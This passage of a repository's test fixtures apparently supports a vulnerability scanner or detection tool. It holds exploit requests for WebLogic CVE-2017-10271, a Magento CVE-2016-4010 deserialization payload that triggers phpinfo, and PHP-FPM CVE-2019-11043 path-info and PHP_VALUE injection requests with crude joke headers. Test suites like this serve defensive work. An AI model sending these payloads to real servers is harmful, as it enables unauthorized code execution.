113 | "Accept-Encoding": "gzip, deflate, compress",
114 | "Accept": "*/*"
115 | },
116 | "Data-File": "test1.txt",
117 | "Reference": "https://github.com/c0mmand3rOpSec/CVE-2017-10271"
118 | },
119 | {
120 | "Method": "POST",
121 | "URI": "/wls-wsat/CoordinatorPortType",
122 | "Headers": {
123 | "User-Agent": "Mozilla/5.0",
124 | "Connection": "close",
125 | "Content-Length": "633",
126 | "Content-Type": "text/xml",
127 | "Accept-Encoding": "gzip, deflate, compress",
128 | "Accept": "*/*"
129 | },
130 | "Data-File": "test2.txt",
131 | "Reference": "https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271"
132 | },
133 | {
134 | "Method": "POST",
135 | "URI": "/wls-wsat/CoordinatorPortType",
136 | "Headers": {
137 | "User-Agent": "Mozilla/5.0",
138 | "Connection": "close",
139 | "Content-Length": "638",
140 | "Content-Type": "text/xml",
141 | "Accept-Encoding": "gzip, deflate, compress",
142 | "Accept": "*/*"
143 | },
144 | "Data-File": "test3.txt",
145 | "Reference": "https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271"
146 | }
147 | ]
--------------------------------------------------------------------------------
/tests/CVE-2016-4010/test1.txt:
--------------------------------------------------------------------------------
1 | {"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"O:13:\"Credis_Client\":22:{s:8:\"\u0000*\u0000redis\";O:45:\"Magento\\Sales\\Model\\Order\\Payment\\Transaction\":40:{s:9:\"\u0000*\u0000_order\";N;s:21:\"\u0000*\u0000_parentTransaction\";N;s:12:\"\u0000*\u0000_children\";N;s:22:\"\u0000*\u0000_identifiedChildren\";N;s:27:\"\u0000*\u0000_transactionsAutoLinking\";b:1;s:14:\"\u0000*\u0000_isFailsafe\";b:1;s:12:\"\u0000*\u0000_hasChild\";N;s:15:\"\u0000*\u0000_eventPrefix\";s:31:\"sales_order_payment_transaction\";s:15:\"\u0000*\u0000_eventObject\";s:25:\"order_payment_transaction\";s:18:\"\u0000*\u0000_orderWebsiteId\";N;s:16:\"\u0000*\u0000_orderFactory\";N;s:15:\"\u0000*\u0000_dateFactory\";N;s:22:\"\u0000*\u0000_transactionFactory\";N;s:25:\"\u0000*\u0000orderPaymentRepository\";N;s:18:\"\u0000*\u0000orderRepository\";N;s:29:\"\u0000*\u0000extensionAttributesFactory\";N;s:22:\"\u0000*\u0000extensionAttributes\";N;s:25:\"\u0000*\u0000customAttributeFactory\";N;s:24:\"\u0000*\u0000customAttributesCodes\";N;s:26:\"\u0000*\u0000customAttributesChanged\";b:0;s:15:\"\u0000*\u0000_idFieldName\";s:2:\"id\";s:18:\"\u0000*\u0000_hasDataChanges\";b:0;s:12:\"\u0000*\u0000_origData\";N;s:13:\"\u0000*\u0000_isDeleted\";b:0;s:12:\"\u0000*\u0000_resource\";O:32:\"Magento\\Framework\\DB\\Transaction\":3:{s:11:\"\u0000*\u0000_objects\";a:0:{}s:18:\"\u0000*\u0000_objectsByAlias\";a:0:{}s:25:\"\u0000*\u0000_beforeCommitCallbacks\";a:1:{i:0;s:7:\"phpinfo\";}}s:22:\"\u0000*\u0000_resourceCollection\";N;s:16:\"\u0000*\u0000_resourceName\";N;s:18:\"\u0000*\u0000_collectionName\";N;s:12:\"\u0000*\u0000_cacheTag\";b:0;s:19:\"\u0000*\u0000_dataSaveAllowed\";b:1;s:15:\"\u0000*\u0000_isObjectNew\";N;s:23:\"\u0000*\u0000_validatorBeforeSave\";N;s:16:\"\u0000*\u0000_eventManager\";N;s:16:\"\u0000*\u0000_cacheManager\";N;s:12:\"\u0000*\u0000_registry\";N;s:10:\"\u0000*\u0000_logger\";N;s:12:\"\u0000*\u0000_appState\";N;s:19:\"\u0000*\u0000_actionValidator\";N;s:13:\"\u0000*\u0000storedData\";a:0:{}s:8:\"\u0000*\u0000_data\";a:0:{}}s:13:\"\u0000*\u0000redisMulti\";N;s:7:\"\u0000*\u0000host\";N;s:7:\"\u0000*\u0000port\";N;s:10:\"\u0000*\u0000timeout\";N;s:14:\"\u0000*\u0000readTimeout\";N;s:13:\"\u0000*\u0000persistent\";N;s:18:\"\u0000*\u0000closeOnDestruct\";b:1;s:12:\"\u0000*\u0000connected\";b:1;s:13:\"\u0000*\u0000standalone\";N;s:20:\"\u0000*\u0000maxConnectRetries\";i:0;s:18:\"\u0000*\u0000connectFailures\";i:0;s:14:\"\u0000*\u0000usePipeline\";b:0;s:15:\"\u0000*\u0000commandNames\";N;s:11:\"\u0000*\u0000commands\";N;s:10:\"\u0000*\u0000isMulti\";b:0;s:13:\"\u0000*\u0000isWatching\";b:0;s:15:\"\u0000*\u0000authPassword\";N;s:13:\"\u0000*\u0000selectedDb\";i:0;s:17:\"\u0000*\u0000wrapperMethods\";a:3:{s:6:\"delete\";s:3:\"del\";s:7:\"getkeys\";s:4:\"keys\";s:7:\"sremove\";s:4:\"srem\";}s:18:\"\u0000*\u0000renamedCommands\";N;s:11:\"\u0000*\u0000requests\";i:0;}"}},"email":"valid@magento.com"}{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"O:13:\"Credis_Client\":22:{s:8:\"\u0000*\u0000redis\";O:45:\"Magento\\Sales\\Model\\Order\\Payment\\Transaction\":40:{s:9:\"\u0000*\u0000_order\";N;s:21:\"\u0000*\u0000_parentTransaction\";N;s:12:\"\u0000*\u0000_children\";N;s:22:\"\u0000*\u0000_identifiedChildren\";N;s:27:\"\u0000*\u0000_transactionsAutoLinking\";b:1;s:14:\"\u0000*\u0000_isFailsafe\";b:1;s:12:\"\u0000*\u0000_hasChild\";N;s:15:\"\u0000*\u0000_eventPrefix\";s:31:\"sales_order_payment_transaction\";s:15:\"\u0000*\u0000_eventObject\";s:25:\"order_payment_transaction\";s:18:\"\u0000*\u0000_orderWebsiteId\";N;s:16:\"\u0000*\u0000_orderFactory\";N;s:15:\"\u0000*\u0000_dateFactory\";N;s:22:\"\u0000*\u0000_transactionFactory\";N;s:25:\"\u0000*\u0000orderPaymentRepository\";N;s:18:\"\u0000*\u0000orderRepository\";N;s:29:\"\u0000*\u0000extensionAttributesFactory\";N;s:22:\"\u0000*\u0000extensionAttributes\";N;s:25:\"\u0000*\u0000customAttributeFactory\";N;s:24:\"\u0000*\u0000customAttributesCodes\";N;s:26:\"\u0000*\u0000customAttributesChanged\";b:0;s:15:\"\u0000*\u0000_idFieldName\";s:2:\"id\";s:18:\"\u0000*\u0000_hasDataChanges\";b:0;s:12:\"\u0000*\u0000_origData\";N;s:13:\"\u0000*\u0000_isDeleted\";b:0;s:12:\"\u0000*\u0000_resource\";O:32:\"Magento\\Framework\\DB\\Transaction\":3:{s:11:\"\u0000*\u0000_objects\";a:0:{}s:18:\"\u0000*\u0000_objectsByAlias\";a:0:{}s:25:\"\u0000*\u0000_beforeCommitCallbacks\";a:1:{i:0;s:7:\"phpinfo\";}}s:22:\"\u0000*\u0000_resourceCollection\";N;s:16:\"\u0000*\u0000_resourceName\";N;s:18:\"\u0000*\u0000_collectionName\";N;s:12:\"\u0000*\u0000_cacheTag\";b:0;s:19:\"\u0000*\u0000_dataSaveAllowed\";b:1;s:15:\"\u0000*\u0000_isObjectNew\";N;s:23:\"\u0000*\u0000_validatorBeforeSave\";N;s:16:\"\u0000*\u0000_eventManager\";N;s:16:\"\u0000*\u0000_cacheManager\";N;s:12:\"\u0000*\u0000_registry\";N;s:10:\"\u0000*\u0000_logger\";N;s:12:\"\u0000*\u0000_appState\";N;s:19:\"\u0000*\u0000_actionValidator\";N;s:13:\"\u0000*\u0000storedData\";a:0:{}s:8:\"\u0000*\u0000_data\";a:0:{}}s:13:\"\u0000*\u0000redisMulti\";N;s:7:\"\u0000*\u0000host\";N;s:7:\"\u0000*\u0000port\";N;s:10:\"\u0000*\u0000timeout\";N;s:14:\"\u0000*\u0000readTimeout\";N;s:13:\"\u0000*\u0000persistent\";N;s:18:\"\u0000*\u0000closeOnDestruct\";b:1;s:12:\"\u0000*\u0000connected\";b:1;s:13:\"\u0000*\u0000standalone\";N;s:20:\"\u0000*\u0000maxConnectRetries\";i:0;s:18:\"\u0000*\u0000connectFailures\";i:0;s:14:\"\u0000*\u0000usePipeline\";b:0;s:15:\"\u0000*\u0000commandNames\";N;s:11:\"\u0000*\u0000commands\";N;s:10:\"\u0000*\u0000isMulti\";b:0;s:13:\"\u0000*\u0000isWatching\";b:0;s:15:\"\u0000*\u0000authPassword\";N;s:13:\"\u0000*\u0000selectedDb\";i:0;s:17:\"\u0000*\u0000wrapperMethods\";a:3:{s:6:\"delete\";s:3:\"del\";s:7:\"getkeys\";s:4:\"keys\";s:7:\"sremove\";s:4:\"srem\";}s:18:\"\u0000*\u0000renamedCommands\";N;s:11:\"\u0000*\u0000requests\";i:0;}"}},"email":"valid@magento.com"}
--------------------------------------------------------------------------------
/tests/CVE-2019-11043/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/index.php/path%0Ainfo.php?QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ",
5 | "Headers": {
6 | "D-Pisos": "8=D",
7 | "Ebut": "mamku tvoyu",
8 | "User-Agent": "Mozilla/5.0",
9 | "Connection": "close"
10 | },
11 | "Reference": "https://github.com/neex/phuip-fpizdam/"
12 | },
13 | {
14 | "Method": "GET",
15 | "URI": "/index.php/path%0ainfo.php?QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ",
16 | "Headers": {
17 | "D-Pisos": "8=D",
18 | "Ebut": "mamku tvoyu",
19 | "User-Agent": "Mozilla/5.0",
20 | "Connection": "close"
21 | },
22 | "Reference": "https://github.com/neex/phuip-fpizdam/"
23 | },
24 | {
25 | "Method": "GET",
26 | "URI": "/index.php/PHP%0Ais_the_crappiest_lang.php?QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ",
27 | "Headers": {
28 | "D-Pisos": "8=D",
29 | "Ebut": "mamku tvoyu",
30 | "User-Agent": "Mozilla/5.0",
31 | "Connection": "close"
32 | },
33 | "Reference": "https://github.com/neex/phuip-fpizdam/"
34 | },
35 | {
36 | "Method": "GET",
37 | "URI": "/index.php/PHP_VALUE%0Alog_errors=1;;;;;;;;;?a=id",
38 | "Headers": {
39 | "D-Pisos": "8=D",
40 | "Ebut": "mamku tvoyu",
41 | "User-Agent": "Mozilla/5.0",
42 | "Connection": "close"
43 | },
44 | "Reference": "https://github.com/neex/phuip-fpizdam/"
45 | }
46 | ]
--------------------------------------------------------------------------------
/tests/CVE-2017-9805/test3.txt:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------